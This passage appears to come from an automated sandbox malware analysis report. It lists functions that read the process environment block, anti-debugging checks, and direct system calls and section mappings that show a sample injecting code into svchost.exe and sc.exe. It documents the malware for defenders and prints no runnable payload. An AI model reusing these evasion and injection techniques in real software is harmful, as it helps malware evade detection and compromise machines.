            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]2_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h]2_2_03B6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h]2_2_03BBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60854 mov eax, dword ptr fs:[00000030h]2_2_03B60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B42840 mov ecx, dword ptr fs:[00000030h]2_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04FE7 mov eax, dword ptr fs:[00000030h]2_2_03C04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF80 mov eax, dword ptr fs:[00000030h]2_2_03B6CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe protection: read writeJump to behavior
